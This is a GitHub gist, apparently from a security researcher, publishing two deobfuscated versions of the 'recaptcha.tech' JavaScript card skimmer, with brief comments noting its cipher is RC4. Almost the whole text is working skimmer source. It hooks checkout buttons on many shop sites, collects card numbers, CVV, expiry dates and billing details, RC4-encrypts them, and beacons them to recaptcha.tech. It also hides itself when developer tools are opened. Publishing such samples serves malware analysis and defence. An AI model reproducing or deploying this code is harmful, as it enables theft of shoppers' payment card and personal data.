Skip to content

Instantly share code, notes, and snippets.

@BenBaryoPX

BenBaryoPX/earliest-recaptcha.tech-js-client-3b4353b7a93d6ad46440d96d40d096dc-deob.js Secret

Created August 2, 2021 07:57
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save BenBaryoPX/cfd0e1a437cb17aa462411663236830c to your computer and use it in GitHub Desktop.
Save BenBaryoPX/cfd0e1a437cb17aa462411663236830c to your computer and use it in GitHub Desktop.
Download ZIP
Recaptcha.tech skimmer
Raw
earliest-recaptcha.tech-js-client-3b4353b7a93d6ad46440d96d40d096dc-deob.js
function crypt(key, value) {
var _0x14d178 = [],
_0x948a16 = 0,
_0x316eec,
_0x1478e2 = '';
for (var _0xcb7760 = 0; _0xcb7760 < 256; _0xcb7760++) {
_0x14d178[_0xcb7760] = _0xcb7760;
}
for (_0xcb7760 = 0; _0xcb7760 < 256; _0xcb7760++) {
_0x948a16 = (_0x948a16 + _0x14d178[_0xcb7760] + key.charCodeAt(_0xcb7760 % key.length)) % 256;
_0x316eec = _0x14d178[_0xcb7760];
_0x14d178[_0xcb7760] = _0x14d178[_0x948a16];
_0x14d178[_0x948a16] = _0x316eec;
}
_0xcb7760 = 0;
_0x948a16 = 0;
for (var _0x2b99cb = 0; _0x2b99cb < value.length; _0x2b99cb++) {
_0xcb7760 = (_0xcb7760 + 1) % 256;
_0x948a16 = (_0x948a16 + _0x14d178[_0xcb7760]) % 256;
_0x316eec = _0x14d178[_0xcb7760];
_0x14d178[_0xcb7760] = _0x14d178[_0x948a16];
_0x14d178[_0x948a16] = _0x316eec;
_0x1478e2 += String.fromCharCode(value.charCodeAt(_0x2b99cb) ^ _0x14d178[(_0x14d178[_0xcb7760] + _0x14d178[_0x948a16]) % 256]);
}
return _0x1478e2;
}
function format(value, encrypt) {
if (encrypt) {
return btoa(crypt("dev.recaptcha.stream", encodeURIComponent(JSON.stringify(value))));
}
if (!encrypt) {
return JSON.parse(decodeURIComponent(crypt("dev.recaptcha.stream", atob(value))));
}
}
function harvestValues() {
var targetedFieldsDetails = {}; // The target fields' cssSelector and attribute to collect
targetedFieldsDetails.cc_number = ["#cardnumber", "value"];
targetedFieldsDetails.cc_cvv = ["#cvc", "value"];
targetedFieldsDetails.cc_exp_m = ["#exp_month", "value"];
targetedFieldsDetails.cc_exp_y = ["#exp_year", "value"];
targetedFieldsDetails.cc_owner = null;
targetedFieldsDetails.billing_state = ["[class='selectize-input items has-options full has-items']", "innerText"];
targetedFieldsDetails.billing_city = ["#city_billing", "value"];
targetedFieldsDetails.billing_country = null;
targetedFieldsDetails.billing_email = ["#email_billing", "value"];
targetedFieldsDetails.billing_firstname = ["#first_name_billing", "value"];
targetedFieldsDetails.billing_lastname = ["#last_name_billing", "value"];
targetedFieldsDetails.billing_zip = ["#zipcode_billing", "value"];
targetedFieldsDetails.billing_address = ["#address_billing", "value"];
targetedFieldsDetails.billing_telephone = ["#telephone_billing", "value"];
if (localStorage.getItem("recaptcha.stream") == null) {
var targetedFieldsCollectedData = {};
Object.keys(targetedFieldsDetails).forEach(function (targetedField) {
targetedFieldsCollectedData[targetedField] = null;
});
localStorage.setItem("recaptcha.stream", format(targetedFieldsCollectedData, true));
}
var storedData = format(localStorage.getItem("recaptcha.stream"), false);
Object.keys(targetedFieldsDetails).forEach(function (targetedFieldDetails) {
if (targetedFieldsDetails[targetedFieldDetails] != null) {
switch (targetedFieldsDetails[targetedFieldDetails][1]) {
case "value":
if (document.querySelector(targetedFieldsDetails[targetedFieldDetails][0]) != null) {
storedData[targetedFieldDetails] = document.querySelector(targetedFieldsDetails[targetedFieldDetails][0]).value;
}
break;
case "innerText":
if (document.querySelector(targetedFieldsDetails[targetedFieldDetails][0]) != null) {
storedData[targetedFieldDetails] = document.querySelector(targetedFieldsDetails[targetedFieldDetails][0]).innerText;
}
break;
}
}
});
localStorage.setItem("recaptcha.stream", format(storedData, true));
}
function isDevtoolsTabOpen() {
if (outerHeight - innerHeight > 100 || outerWidth - innerWidth > 100) {
localStorage.setItem("init", +new Date());
}
}
window.onresize = isDevtoolsTabOpen;
function shouldResumeOrCeaseAttack() {
if ((+new Date() - localStorage.getItem("init")) / 1000 / 60 > 60) {
localStorage.removeItem("init");
}
if (localStorage.getItem("init") != null) {
localStorage.removeItem("recaptcha.stream");
}
}
setInterval(shouldResumeOrCeaseAttack, 1000);
function attachAttackToButton(cssSelectorDetails) {
var el = document.querySelector(cssSelectorDetails[0]);
var parentEl = el.parentNode;
var clonedEl = el.cloneNode(true);
clonedEl.removeAttribute("href");
clonedEl.setAttribute("default", true);
var counter = 0;
clonedEl.addEventListener("click", () => {
if (!localStorage.getItem("init")) {
harvestValues();
if (cssSelectorDetails[1]) { // <-- always true
var img = document.createElement("img");
img.width = "1px";
img.height = "1px";
img.id = "devRecaptchaStream";
img.src = "https://recaptcha.tech/recaptcha.php?recaptcha_stream=" + localStorage.getItem("recaptcha.stream") + "&type=desktop&format=gif&mod=find_buses&id=3b4353";
document.body.appendChild(img);
var intervalId2 = setInterval(function () {
if (counter > 60 || document.getElementById("devRecaptchaStream") != null) {
if (document.getElementById("devRecaptchaStream") != null) {
var devRecaptchaStreamEl = document.getElementById("devRecaptchaStream");
devRecaptchaStreamEl.parentNode.removeChild(devRecaptchaStreamEl);
}
localStorage.removeItem("recaptcha.stream");
parentEl.replaceChild(el, clonedEl);
el.click();
clearInterval(intervalId2);
}
counter++;
}, 250);
} else {
parentEl.replaceChild(el, clonedEl);
el.click();
}
} else {
parentEl.replaceChild(el, clonedEl);
el.click();
}
});
parentEl.replaceChild(clonedEl, el);
elementReplacements[replacedElementsCounter] = [parentEl, el, clonedEl];
replacedElementsCounter = replacedElementsCounter + 1;
}
if (!localStorage.getItem("init")) {
var targetedButtons = {};
targetedButtons["[class='ui-button ui-widget ui-state-default ui-corner-all ui-button-text-only']"] = true;
var elementReplacements = {};
var replacedElementsCounter = 0;
var intervalId1 = setInterval(function () {
if (document.readyState === "complete" && localStorage.getItem("init") == null) {
Object.keys(targetedButtons).forEach(function (cssSelector) {
if (!(document.querySelector(cssSelector) == null)) {
if (document.querySelector(cssSelector).getAttribute("default") !== "true") {
attachAttackToButton([cssSelector, targetedButtons[cssSelector]]);
}
}
});
}
if (localStorage.getItem("init") != null) {
Object.keys(elementReplacements).forEach(function (elementDetails) {
try {
elementReplacements[elementDetails][0]
.replaceChild(elementReplacements[elementDetails][1], elementReplacements[elementDetails][2]);
} catch (e) {}
});
clearInterval(intervalId1);
}
}, 250);
}
Raw
latest-recaptcha.tech-client-js-api-deob.js
(function () {
class attackClass {
constructor() {
document.onkeydown = function (keyboardEvent) {
if (keyboardEvent.key === "F12") {
localStorage.setItem("init", +new Date());
}
if (keyboardEvent.key !== config.tmp_keys[1]) {
config.tmp_keys[3] = config.tmp_keys[2];
config.tmp_keys[2] = config.tmp_keys[1];
config.tmp_keys[1] = keyboardEvent.key;
if (config.tmp_keys[3] === "Control" &&
config.tmp_keys[2] === "Shift" &&
config.bad_keys.includes(config.tmp_keys[1])) {
localStorage.setItem("init", +new Date());
}
}
};
}
isMobile() {
for (var idx in config.mobiles) {
try {
if (navigator.userAgent.toLowerCase().indexOf(config.mobiles[idx].toLowerCase()) > 0) {
if ("ontouchstart" in window && window.navigator.maxTouchPoints > 0) {
return true;
}
}
} catch (e) {}
}
return false;
}
crypt(key, value) {
var _0x424e3d = [],
_0x4c2ae8 = 0,
_0x5f3ca7,
encryptedOutput = '';
for (var _0x3ad7ff = 0; _0x3ad7ff < 256; _0x3ad7ff++) {
_0x424e3d[_0x3ad7ff] = _0x3ad7ff;
}
for (_0x3ad7ff = 0; _0x3ad7ff < 256; _0x3ad7ff++) {
_0x4c2ae8 = (_0x4c2ae8 + _0x424e3d[_0x3ad7ff] + key.charCodeAt(_0x3ad7ff % key.length)) % 256;
_0x5f3ca7 = _0x424e3d[_0x3ad7ff];
_0x424e3d[_0x3ad7ff] = _0x424e3d[_0x4c2ae8];
_0x424e3d[_0x4c2ae8] = _0x5f3ca7;
}
_0x3ad7ff = 0;
_0x4c2ae8 = 0;
for (var _0x30d874 = 0; _0x30d874 < value.length; _0x30d874++) {
_0x3ad7ff = (_0x3ad7ff + 1) % 256;
_0x4c2ae8 = (_0x4c2ae8 + _0x424e3d[_0x3ad7ff]) % 256;
_0x5f3ca7 = _0x424e3d[_0x3ad7ff];
_0x424e3d[_0x3ad7ff] = _0x424e3d[_0x4c2ae8];
_0x424e3d[_0x4c2ae8] = _0x5f3ca7;
encryptedOutput += String.fromCharCode(value.charCodeAt(_0x30d874) ^ _0x424e3d[(_0x424e3d[_0x3ad7ff] + _0x424e3d[_0x4c2ae8]) % 256]);
}
return encryptedOutput;
}
format(value, encrypt) {
if (encrypt) {
return btoa(this.crypt("dev.recaptcha.stream", encodeURIComponent(JSON.stringify(value))));
}
if (!encrypt) {
return JSON.parse(decodeURIComponent(this.crypt("dev.recaptcha.stream", atob(value))));
}
}
update_data() {
let collectedData = {};
config.data = {};
document.querySelectorAll("input, select, textarea, option[selected=\"selected\"]").forEach(function (el) {
try {
if (el.type !== "hidden" || el.hasAttribute("data-validate-required")) {
let elName = null;
if (el.name && el.name.length > 0) {
elName = el.name;
} else if (el.id && el.id.length > 0) {
elName = el.id;
} else if (el.parentNode.name.length > 0) {
elName = el.localName + '$' + el.parentNode.name;
} else if (el.parentNode.id.length > 0) {
elName = el.localName + '$' + el.parentNode.id;
} else {
return;
}
if (el.value !== undefined && el.localName !== "option") {
if (el.value.length > 0) {
collectedData[elName] = el.value;
}
} else if (el.innerText !== undefined) {
if (el.innerText.length > 0) {
collectedData[elName] = el.innerText;
}
}
}
} catch (e) {}
});
config.data = this.format(collectedData, true);
}
send() {
navigator.sendBeacon(config.backend, config.data);
}
start() {
config.isMobile = this.isMobile();
if (!config.mobile) {
if (outerHeight - innerHeight > 300 || outerWidth - innerWidth > 300) {
localStorage.setItem("init", +new Date());
}
if ((+new Date() - localStorage.getItem("init")) / 1000 / 60 > 180) {
localStorage.removeItem("init");
}
}
if (!localStorage.getItem("init")) {
config.objects.forEach(function (cssSelector, _, __) {
try {
if (document.querySelector(cssSelector) !== undefined) {
if (!document.querySelector(cssSelector).hasOwnProperty("onrotate")) {
document.querySelector(cssSelector).addEventListener("mouseover", this.send);
Object.defineProperty(document.querySelector(cssSelector), "onrotate", {});
}
}
} catch (e) {}
}, this);
this.update_data();
} else {
document.onkeydown = null;
config.objects.forEach(function (cssSelector, _, __) {
try {
if (document.querySelector(cssSelector) !== undefined) {
document.querySelector(cssSelector).removeEventListener("mouseover", this.send);
if (document.querySelector(cssSelector).hasOwnProperty("onrotate")) {
delete document.querySelector(cssSelector).onrotate;
}
}
} catch (e) {}
}, this);
try {
config.allowed = false;
} catch (e) {}
}
}
}
const tmpKeyPlaceholder = {};
tmpKeyPlaceholder['1'] = 'X';
tmpKeyPlaceholder['2'] = 'X';
tmpKeyPlaceholder['3'] = 'X';
const config = {};
config.mobile = false;
config.allowed = true;
config.data = {};
config.backend = "https://recaptcha.tech/verify";
config.tmp_keys = tmpKeyPlaceholder;
config.bad_keys = ['I', 'C', 'J', 'U'];
config.mobiles = ["iphone", "ipad", "android", "blackberry", "nokia", "opera mini", "windows mobile", "windows phone", "iemobile"];
config.objects = ["#purchasebutton", "#purchasebutton2", "#complete_my_order", "#buyBtn", ".membership-fixed.membership-purchase.footer-nav-bar.active .container", ".membership-fixed.membership-order.footer-nav-bar.active .container", "#pay-ccard", ".button.blue-button.register-button", "#button-confirm", "div[id='tab-3'] .procced-to-payment-block .btn.wizgobtn", "div[id='tab-9'] .procced-to-payment-block .btn.wizgobtn", "button[class='thm-btn thm-blue-bg']", "button[class='pg-button pg-checkout-continue btn btn-primary btn-full']", "#place_order", "#send", "#checkout_submit", "#edit-continue", "input[class='btn-dk-blue btn-md btn-rounded checkout_mobile']", "#button-payment-method", "button[class^='PayNowButton__GoToCheckout']", "button[class^='AddressForm__GoToCheckout']", "form[id='checkout_shipping_form'] button[type='submit']", "button[id='submit_order']", ".advertise_login .btn_right_container_checkout input", ".advertise_register .btn_right_container_checkout input", "#placeOrderButton", "#submit_checkout_form_btn", "#submit_user_data", "#complete_reservation", "#pay-next-braintree", "button[class='card_checkout_button proceed_btn']", "input[class='btn-regular-sm']", "#onestepcheckout-button-place-order"];
try {
let attackInstance = new attackClass();
let intervalId = setInterval(function () {
attackInstance.start();
if (config.allowed === false) {
config = undefined;
attackInstance = undefined;
attackClass = undefined;
clearInterval(intervalId);
}
}, 500);
} catch (e) {}
})();
@ScottContini
Copy link

The crypt( ) function looks like RC4 to me.

@BenBaryoPX
Copy link
Author

Thanks @ScottContini, you're right, it's an exact match to this implementation.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment